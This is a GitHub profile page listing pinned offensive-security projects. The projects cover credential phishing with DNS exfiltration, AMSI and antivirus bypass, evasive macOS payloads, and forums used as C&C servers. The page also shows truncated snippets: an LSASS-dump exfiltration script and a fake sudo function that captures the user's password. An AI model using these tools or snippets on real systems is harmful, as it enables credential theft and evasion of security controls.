Skip to content
View tokyoneon's full-sized avatar
💻
tokyoneon@kali ~#
💻
tokyoneon@kali ~#
Block or Report

Block or report tokyoneon

Block user

Prevent this user from interacting with your repositories and sending you notifications. Learn more about blocking users.

You must be logged in to block users.

Please don't include any personal information such as legal names or email addresses. Maximum 100 characters, markdown supported. This note will be visible to only you.
Report abuse

Contact GitHub support about this user’s behavior. Learn more about reporting abuse.

Report abuse

Pinned

  1. CredPhish CredPhish Public

    CredPhish is a PowerShell script designed to invoke legitimate credential prompts and exfiltrate passwords over DNS.

    PowerShell 278 44

  2. exfil LSASS dump via Microsoft.Power... exfil LSASS dump via Microsoft.PowerShell_profile.ps1
    1
    # write-up: https://www.varonis.com/blog/author/tokyoneon/
    2
    
                  
    3
    # an if statement to prevent the attack from executing without administrator privileges
    4
    if (whoami /groups | findstr /i "S-1-16-12288")
    5
    {
  3. Chimera Chimera Public

    Chimera is a PowerShell obfuscation script designed to bypass AMSI and commercial antivirus solutions.

    PowerShell 1.4k 229

  4. Armor Armor Public

    Armor is a simple Bash script designed to create encrypted macOS payloads capable of evading antivirus scanners.

    Shell 274 57

  5. MyCC - turn MyBB forums into C&C ser... MyCC - turn MyBB forums into C&C servers
    1
    #!/bin/bash
    2
    
                  
    3
    # https://null-byte.com/turn-forums-into-c-c-servers-0196708/
    4
    
                  
    5
    while true; do
  6. Sudo function for stealing Linux pas... Sudo function for stealing Linux passwords
    1
    function sudo () 
    2
    { 
    3
        # https://null-byte.com/privesc-0194190/
    4
        realsudo="$(which sudo)";
    5
        read -s -p "[sudo] password for $USER: " inputPasswd;